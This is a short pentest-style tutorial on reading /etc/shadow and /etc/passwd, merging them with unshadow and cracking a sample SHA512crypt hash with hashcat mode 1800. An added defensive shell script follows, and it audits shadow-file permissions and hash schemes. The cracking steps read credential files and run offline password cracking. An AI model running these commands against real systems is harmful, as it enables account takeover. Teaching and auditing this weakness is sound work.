Shadow

If we have read access to the /etc/shadow and /etc/passwd files, we can use the following method to obtain the password hashes and crack them using hashcat.

# Copy the contents of the /etc/passwd and /etc/shadow files to your attacking machine.
cat /etc/passwd > passwd
cat /etc/shadow > shadow

Use the unshadow tool to combine both files into a crackable form.

unshadow passwd shadow > unshadowed

Now remove the unwanted entries and keep only the users' hashes, like this.

# I removed all the other users and only kept one user.
cat unshadowed
jacob:$6$U1PPMuDVS0UeUB.k$a5gdmzT0yt3kFR1hZVBeUhsZc9zUtKbIaP.fUt8OT0Fs0ot76bQGn4lTvsK551DUQNOD8hgxjcYZrR09nTcDB0:1000:1000:,,,:/home/kali:/usr/bin/zsh

Now we'll use hashcat with mode 1800, which covers "SHA512crypt $6$, SHA512 (Unix)" hashes.

hashcat -m 1800 unshadowed /usr/share/wordlists/rockyou.txt
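
The defender's counterpart to the steps above, as an added example that is not part of the original page: a shell audit that checks whether a shadow-format file is readable by other users and reports which hash scheme each account uses, based on the crypt prefix. It goes beyond the `$6$` case shown here to the other common prefixes. The function names and the sample entries are constructed for illustration.

```shell
#!/bin/sh
# Added example: audit a shadow-format file from the defender's side.
# Function names and the sample entries are constructed for illustration.

# Exit 0 only when the file grants no permission bits to "other".
shadow_mode_ok() {
    [ "$(ls -ld "$1" | cut -c8-10)" = "---" ]
}

# Print "user scheme" for each account holding a usable password field.
shadow_schemes() {
    awk -F: '
        $2 == ""     { print $1, "EMPTY"; next }   # login without a password
        $2 ~ /^[!*]/ { next }                      # locked / no password login
        {
            s = "descrypt-or-unknown"
            if      ($2 ~ /^\$1\$/)        s = "md5crypt"
            else if ($2 ~ /^\$2[abxy]?\$/) s = "bcrypt"
            else if ($2 ~ /^\$5\$/)        s = "sha256crypt"
            else if ($2 ~ /^\$6\$/)        s = "sha512crypt"
            else if ($2 ~ /^\$y\$/)        s = "yescrypt"
            print $1, s
        }' "$1"
}

# Accounts whose stored form is empty, legacy DES, or md5crypt.
shadow_weak() {
    shadow_schemes "$1" |
        awk '$2 == "EMPTY" || $2 == "md5crypt" || $2 == "descrypt-or-unknown" { print $1 }'
}

# Constructed sample (salts and digests are placeholders, not real hashes).
SAMPLE_DIR=$(mktemp -d)
SAMPLE="$SAMPLE_DIR/shadow.sample"
cat > "$SAMPLE" <<'EOF'
root:!:19700:0:99999:7:::
daemon:*:19700:0:99999:7:::
jacob:$6$SALTSALT$PLACEHOLDERDIGEST:19700:0:99999:7:::
legacy:$1$SALTSALT$PLACEHOLDERDIGEST:19700:0:99999:7:::
svc:$y$j9T$SALTSALT$PLACEHOLDERDIGEST:19700:0:99999:7:::
guest::19700:0:99999:7:::
EOF
chmod 644 "$SAMPLE"   # deliberately too open, to exercise the mode check

if shadow_mode_ok "$SAMPLE"; then echo "mode: ok"; else echo "mode: readable by others"; fi
shadow_schemes "$SAMPLE"
echo "weak: $(shadow_weak "$SAMPLE" | tr '\n' ' ')"
```

On a real host, run the functions against /etc/shadow as root; a failing mode check means any local user can perform the copy step shown at the top of this page.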
